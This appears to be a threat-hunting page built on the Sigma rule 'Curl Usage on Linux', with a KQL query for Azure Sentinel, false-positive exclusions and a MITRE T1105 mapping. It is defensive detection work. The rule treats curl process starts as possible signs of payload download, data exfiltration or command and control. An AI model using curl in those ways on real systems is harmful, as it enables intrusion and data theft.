Curl Usage on Linux

Hunt Hypothesis

Curl usage on Linux may indicate an adversary attempting to exfiltrate data or establish a command and control channel by downloading malicious payloads or communicating with remote servers. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential lateral movement or data exfiltration activities early.

Detection Rule

Sigma (Original)

title: Curl Usage on Linux
id: ea34fb97-e2c4-4afb-810f-785e4459b194
status: test
description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
references:
    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-15
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/curl'
    condition: selection
falsepositives:
    - Scripts created by developers and admins
    - Administrative activity
level: low

KQL (Azure Sentinel)

imProcessCreate
| where TargetProcessName endswith "/curl"

False Positive Guidance

• Scenario: System update using curl via a package manager (e.g., apt or yum)
  Filter/Exclusion: Check for known update URLs (e.g., http://archive.ubuntu.com, https://repo.centos.org) in the command line or use a filter like process.command_line contains "apt" or "yum"

• Scenario: Scheduled job using curl to fetch a configuration file from an internal server
  Filter/Exclusion: Exclude processes with cron or systemd in the command line, or filter by known internal IP ranges (e.g., 10.0.0.0/8)

• Scenario: Admin task using curl to test a web service or API endpoint
  Filter/Exclusion: Filter by user (e.g., root or admin) and check for known testing endpoints (e.g., /health, /status), or use a filter like process.user == "admin"

• Scenario: Log collection tool using curl to send logs to a centralized logging server
  Filter/Exclusion: Identify the log collection tool (e.g., fluentd, logstash) and filter by its process name or command line arguments

• Scenario: CI/CD pipeline using curl to fetch dependencies or artifacts from a private registry
  Filter/Exclusion: Filter by known CI/CD tools (e.g., Jenkins, GitLab CI) or check for private registry URLs (e.g., https://registry.example.com) in the command line

MITRE ATT&CK Context

• Tactic: Command and Control
• Technique: T1105